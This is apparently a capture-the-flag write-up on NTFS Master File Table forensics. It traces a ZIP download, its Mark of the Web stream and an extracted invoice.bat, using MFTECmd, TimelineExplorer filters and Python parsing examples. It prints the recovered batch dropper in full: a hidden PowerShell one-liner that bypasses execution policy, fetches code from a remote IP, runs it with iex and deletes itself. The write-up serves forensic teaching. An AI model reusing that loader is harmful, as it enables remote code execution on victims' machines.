BFT

Scenario

In this Sherlock, you will become acquainted with MFT (Master File Table) forensics. You will be introduced to well-known tools and methodologies for analyzing MFT artifacts to identify malicious activity. During our analysis, you will utilize the MFTECmd tool to parse the provided MFT file, TimeLine Explorer to open and analyze the results from the parsed MFT, and a Hex editor to recover file contents from the MFT.

Summary

On 2024-02-13 at 16:39:06 a ZIP file named Stage-20240213T093324Z-001.zip was downloaded into the user profile of simon.stark (path: C:\Users\simon.stark\Downloads). The ZIP contained invoice.bat, a downloader/launcher that executes PowerShell with -nop -ep bypass to fetch and execute a remote payload from http://43.204.110.203:6666/ and then self‑deletes.

Concepts

Master File Table

The Master File Table (MFT) is a critical component within the NTFS (New Technology File System), which is the file system used by Windows operating systems. The MFT is essentially a database that stores metadata about every file and directory on an NTFS volume. Its role and structure make it a fundamental resource in digital forensics, particularly when dealing with Windows-based environments.

  • The MFT provides a detailed record of each file, including timestamps, permissions, and data content locations, making it invaluable for forensic investigations.

  • The MFT records details about each file and directory on an NTFS drive.

  • Allows recovery of details about deleted files.

  • Since the MFT records file creation and details, unusual changes detected in these entries can indicate unauthorized or malware activity.

MFTECMD: https://download.ericzimmermanstools.com/MFTECmd.zip

TimelineExplorer: https://download.ericzimmermanstools.com/net9/TimelineExplorer.zip

Hxd: https://mh-nexus.de/downloads/HxDPortableSetup.zip

Converting an MFT dump file into CSV using MFTECmd

MFTECmd.exe -f "C:\Your\Directory\$MFT" --csv "C:\Your\Output\Directory" --csvf mft.csv

Summary

Files & Artifacts

Hash                              File     Notes
74c118fe20681a053866621543d5decc  BFT.zip  -

Event Types Observed

Indicators of Compromise (IOCs)

Type            Indicator                        Description
Zip file        Stage-20240213T093324Z-001.zip   -
URL Source      https://storage.googleapis.com/drive-bulk-export-anonymous/20240213T093324.039Z/4133399871716478688/a40aecd0-1cf3-4f88-b55a-e188d5c1c04f/1/c277a8b4-afa9-4d34-b8ca-e1eb5e5f983c?authuser   MOTW ZoneId=3 indicates the file came from the internet
Malicious file  invoice.bat                      -

Chronological Attack Timeline

The analysis was conducted using TimelineExplorer, which revealed that on 2024-02-13 at 16:39:06 a malicious file was downloaded by simon.stark to C:\Users\simon.stark\Downloads\Stage-20240213T093324Z-001.zip.

Filter: EndsWith([Extension], 'zip') And IsSameDay([Created0x10], #2024-02-13#)

Searching for Stage-20240213T093324Z-001.zip:Zone.Identifier, it was determined that the file originated from the internet, and the source it was delivered from was identified.

Filter: IsSameDay([Created0x10], #2024-02-13#) And Contains([File Name], 'Stage')

[ZoneTransfer]
ZoneId=3
HostUrl=https://storage.googleapis.com/drive-bulk-export-anonymous/20240213T093324.039Z/4133399871716478688/a40aecd0-1cf3-4f88-b55a-e188d5c1c04f/1/c277a8b4-afa9-4d34-b8ca-e1eb5e5f983c?authuser

Zone.Identifier is an Alternate Data Stream (ADS) that Windows appends to files downloaded from the Internet. It contains the Mark of the Web (e.g., ZoneId=3, HostUrl=..., ReferrerUrl=...), which allows you to determine whether the file came from the web, its source URL, and (sometimes) the referring page. In forensic analysis, this is invaluable: it confirms that the binary was downloaded (not created locally), provides the URL for correlation with proxy/web logs, and helps time-stamp the event.

Further examination shows that at 16:38:39 a malicious invoice.bat was created at:

  • C:\Users\simon.stark\Downloads\Stage-20240213T093324Z-001\Stage\invoice\invoices\invoice.bat

Filter: IsSameDay([Created0x10], #2024-02-13#) And Contains([Parent Path], 'Stage')
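The three filters above are TimelineExplorer expressions; the same triage can be scripted over the mft.csv that MFTECmd writes. The following is an added example, not part of the write-up or of Eric Zimmerman's tools: it loads constructed MFTECmd-style rows (the column names EntryNumber, ParentPath, FileName, Extension, IsAds, Created0x10 and ZoneIdContents are assumed to match MFTECmd's CSV headers, which TimelineExplorer displays as [Parent Path], [File Name] and so on; the paths, timestamps and HostUrl are sample values), applies each filter and orders the hits into a timeline.

```python
import csv
import io
import re

# Constructed MFTECmd-style rows (paths, times and URL are sample values). The ADS row
# keeps its parent's name with ':Zone.Identifier' appended; its ZoneIdContents cell is
# flattened to one line here.
MFT_CSV = r"""EntryNumber,ParentPath,FileName,Extension,IsAds,Created0x10,ZoneIdContents
101,.\Users\simon.stark\Downloads,Stage-20240213T093324Z-001.zip,.zip,False,2024-02-13 16:39:06.0000000,
102,.\Users\simon.stark\Downloads,Stage-20240213T093324Z-001.zip:Zone.Identifier,.Identifier,True,2024-02-13 16:39:06.0000000,[ZoneTransfer] ZoneId=3 HostUrl=https://storage.googleapis.com/drive-bulk-export-anonymous/EXAMPLE/Stage.zip
103,.\Users\simon.stark\Downloads\Stage-20240213T093324Z-001\Stage\invoice\invoices,invoice.bat,.bat,False,2024-02-13 16:38:39.0000000,
104,.\Windows\System32,kernel32.dll,.dll,False,2019-12-07 09:08:00.0000000,
105,.\Users\simon.stark\Documents,report.zip,.zip,False,2024-02-12 10:00:00.0000000,
"""
DAY = "2024-02-13"   # the #2024-02-13# literal used in the filters


def load_mft(text):
    """MFTECmd CSV text -> list of dict rows (one per MFT entry or ADS)."""
    return list(csv.DictReader(io.StringIO(text)))


def is_same_day(created0x10, day):
    """IsSameDay([Created0x10], #day#): MFTECmd timestamps begin with YYYY-MM-DD."""
    return created0x10[:10] == day


def downloaded_archives(rows, day):
    """EndsWith([Extension], 'zip') And IsSameDay([Created0x10], #day#)"""
    return [r for r in rows
            if r["Extension"].lower().endswith("zip") and is_same_day(r["Created0x10"], day)]


def mark_of_the_web(rows, fragment, day):
    """IsSameDay([Created0x10], #day#) And Contains([File Name], fragment), then read
    ZoneId/HostUrl out of the Zone.Identifier ADS rows among the matches."""
    hits = []
    for r in rows:
        if not (is_same_day(r["Created0x10"], day) and fragment in r["FileName"]):
            continue
        if r["FileName"].endswith(":Zone.Identifier"):
            zone = re.search(r"ZoneId=(\d)", r["ZoneIdContents"])
            host = re.search(r"HostUrl=(\S+)", r["ZoneIdContents"])
            hits.append({"entry": r["EntryNumber"], "created": r["Created0x10"],
                         "file": r["FileName"].split(":")[0],
                         "zone_id": zone.group(1) if zone else None,
                         "host_url": host.group(1) if host else None})
    return hits


def dropped_under(rows, fragment, day):
    """IsSameDay([Created0x10], #day#) And Contains([Parent Path], fragment)"""
    return [r for r in rows if is_same_day(r["Created0x10"], day) and fragment in r["ParentPath"]]


def triage(rows, day):
    """Run the three filters and order every hit by Created0x10 to build the timeline."""
    findings = []
    for r in downloaded_archives(rows, day):
        findings.append({"created": r["Created0x10"], "entry": r["EntryNumber"],
                         "what": "archive created", "detail": r["ParentPath"] + "\\" + r["FileName"]})
    for m in mark_of_the_web(rows, "Stage", day):
        findings.append({"created": m["created"], "entry": m["entry"],
                         "what": "MOTW zone %s from %s" % (m["zone_id"], m["host_url"]),
                         "detail": m["file"]})
    for r in dropped_under(rows, "Stage", day):
        findings.append({"created": r["Created0x10"], "entry": r["EntryNumber"],
                         "what": "file created under extracted archive",
                         "detail": r["ParentPath"] + "\\" + r["FileName"]})
    # sorted() is stable, so hits with the same timestamp keep their insertion order
    return sorted(findings, key=lambda f: f["created"])


if __name__ == "__main__":
    for f in triage(load_mft(MFT_CSV), DAY):
        print(f["created"], f["entry"], f["what"], f["detail"])
```

Created0x10 comes from $STANDARD_INFORMATION, which user-mode code can rewrite; when an ordering looks odd, compare it against the Created0x30 ($FILE_NAME) column that MFTECmd also emits before treating it as the true sequence of events.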

Finally, to retrieve the file content, the MFT Record Number was used to locate the entry in the HxD hex editor, from which the content could be read.

File: invoice.bat:

@echo off
start /b powershell.exe -nol -w 1 -nop -ep bypass "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://43.204.110.203:6666/download/powershell/Om1hdHRpZmVzdGF...') -UseBasicParsing|iex"
(goto) 2>nul & del "%~f0"
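As an added example, not part of the write-up or of MFTECmd/HxD, the following Python builds a constructed 1024-byte MFT FILE record for a small file (a stand-in body plus a Zone.Identifier ADS) and then parses it back the way the HxD step above is done by hand: undo the per-sector fixups, walk the attributes, pull out every resident $DATA stream (the unnamed one is the file body; named ones are alternate data streams such as Zone.Identifier) and decode the Mark of the Web fields described earlier. The record number, USN, HostUrl and stream contents are constructed sample values.

```python
import struct

RECORD_SIZE = 1024      # MFT record size on almost every NTFS volume
SECTOR = 512            # fixups are applied per 512-byte sector
ATTR_DATA = 0x80        # $DATA attribute type; an ADS is a named $DATA
ATTR_END = 0xFFFFFFFF   # end-of-attributes marker
USN = b"\x07\x00"       # constructed update sequence number


def _resident_attr(attr_type, name, content):
    """Build one resident attribute; name '' is the main stream, anything else an ADS."""
    name_bytes = name.encode("utf-16-le")
    name_off = 0x18                          # resident attribute header is 24 bytes
    content_off = name_off + len(name_bytes)
    content_off += -content_off % 8          # content starts 8-byte aligned
    length = content_off + len(content)
    length += -length % 8                    # whole attribute is 8-byte aligned
    hdr = struct.pack("<IIBBHHHIHBB", attr_type, length, 0, len(name), name_off,
                      0, 0, len(content), content_off, 0, 0)
    body = hdr + name_bytes
    body += b"\x00" * (content_off - len(body)) + content
    return body + b"\x00" * (length - len(body))


def build_mft_record(record_number, streams):
    """Constructed in-use FILE record holding resident $DATA streams, fixups applied."""
    attrs = b"".join(_resident_attr(ATTR_DATA, n, c) for n, c in streams)
    attrs += struct.pack("<I", ATTR_END) + b"\x00" * 4
    first_attr = 0x38                        # update sequence array (3 x 2 bytes at 0x30), padded
    used = first_attr + len(attrs)
    hdr = struct.pack("<4sHHQHHHHIIQHHI", b"FILE", 0x30, 3, 0, 1, 1, first_attr,
                      0x01, used, RECORD_SIZE, 0, len(streams) + 1, 0, record_number)
    rec = bytearray(hdr.ljust(first_attr, b"\x00") + attrs)
    rec += b"\x00" * (RECORD_SIZE - len(rec))
    # Fixups: the last two bytes of every sector are replaced by the USN and the
    # original bytes are parked in the update sequence array behind the USN.
    rec[0x30:0x32] = USN
    for i in range(RECORD_SIZE // SECTOR):
        end = (i + 1) * SECTOR
        rec[0x32 + 2 * i:0x34 + 2 * i] = rec[end - 2:end]
        rec[end - 2:end] = USN
    return bytes(rec)


def parse_mft_record(raw):
    """Undo the fixups, walk the attributes, return every resident $DATA stream by name."""
    if raw[:4] != b"FILE":
        raise ValueError("not a FILE record")
    rec = bytearray(raw)
    usa_off, usa_count = struct.unpack_from("<HH", rec, 4)
    usn = bytes(rec[usa_off:usa_off + 2])
    for i in range(1, usa_count):
        end = i * SECTOR
        if rec[end - 2:end] != usn:
            raise ValueError("fixup mismatch: torn or corrupt record")
        rec[end - 2:end] = rec[usa_off + 2 * i:usa_off + 2 * i + 2]
    first_attr, flags, used = struct.unpack_from("<HHI", rec, 0x14)
    record_number = struct.unpack_from("<I", rec, 0x2C)[0]
    streams, off = {}, first_attr
    while off + 8 <= used:
        atype, alen = struct.unpack_from("<II", rec, off)
        if atype == ATTR_END or alen == 0:
            break
        non_resident, name_len, name_off = struct.unpack_from("<BBH", rec, off + 8)
        name = rec[off + name_off:off + name_off + 2 * name_len].decode("utf-16-le")
        if atype == ATTR_DATA and not non_resident:   # resident: bytes live inside the record
            clen, coff = struct.unpack_from("<IH", rec, off + 0x10)
            streams[name] = bytes(rec[off + coff:off + coff + clen])
        off += alen
    return {"record_number": record_number, "in_use": bool(flags & 1), "streams": streams}


ZONE_NAMES = {"0": "Local machine", "1": "Local intranet", "2": "Trusted sites",
              "3": "Internet", "4": "Restricted sites"}


def parse_zone_identifier(data):
    """Decode Zone.Identifier ADS bytes into ZoneId / HostUrl / ReferrerUrl plus a zone name."""
    info = {}
    for line in data.decode("utf-8", "replace").splitlines():
        key, sep, value = line.partition("=")
        if sep and not line.startswith("["):
            info[key.strip()] = value.strip()
    info["ZoneName"] = ZONE_NAMES.get(info.get("ZoneId"), "unknown")
    return info


# Constructed sample: a small extracted file whose body is resident, plus the
# Zone.Identifier ADS it carries (Explorer propagates the mark when extracting a marked ZIP).
INVOICE_BODY = b"@echo off\r\nREM constructed stand-in for the recovered invoice.bat\r\n" * 7
ZONE_ADS = (b"[ZoneTransfer]\r\nZoneId=3\r\n"
            b"HostUrl=https://storage.googleapis.com/drive-bulk-export-anonymous/EXAMPLE/Stage.zip\r\n")


def recover_invoice():
    """Build the sample record (number 4711 is constructed) and recover both streams from it."""
    raw = build_mft_record(4711, [("", INVOICE_BODY), ("Zone.Identifier", ZONE_ADS)])
    parsed = parse_mft_record(raw)
    parsed["motw"] = parse_zone_identifier(parsed["streams"]["Zone.Identifier"])
    return raw, parsed


if __name__ == "__main__":
    raw, parsed = recover_invoice()
    print(parsed["streams"][""].decode(), parsed["motw"])
    # The body straddles the first sector boundary, so a plain string search over the
    # raw record misses it until the fixup bytes are put back.
    print("raw bytes contain the full body:", INVOICE_BODY in raw)
```

The sample body is sized so that it crosses the 512-byte sector boundary: in the raw record the two bytes at offsets 510 and 511 hold the USN, not file data, which is why a hex-editor string search can miss content that is really there and why the record must be read with the fixups reversed before carving from it.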

Recommendations

  • Isolate the infected host from the network and preserve a forensic image (disk + memory).

  • Block IP 43.204.110.203 and the ADS HostUrl at firewall/proxy.

  • Collect artifacts: recovered invoice.bat, mft.csv, ADS contents, PowerShell logs, proxy logs; compute SHA256.

  • Hunt the environment for the HostUrl, downloader URL, file names and hashes.

  • Check persistence: Scheduled Tasks, Registry Run keys, Services, WMI persistence.

  • Rotate credentials if compromise of credentials is suspected.

  • Consider rebuild if system integrity is uncertain.
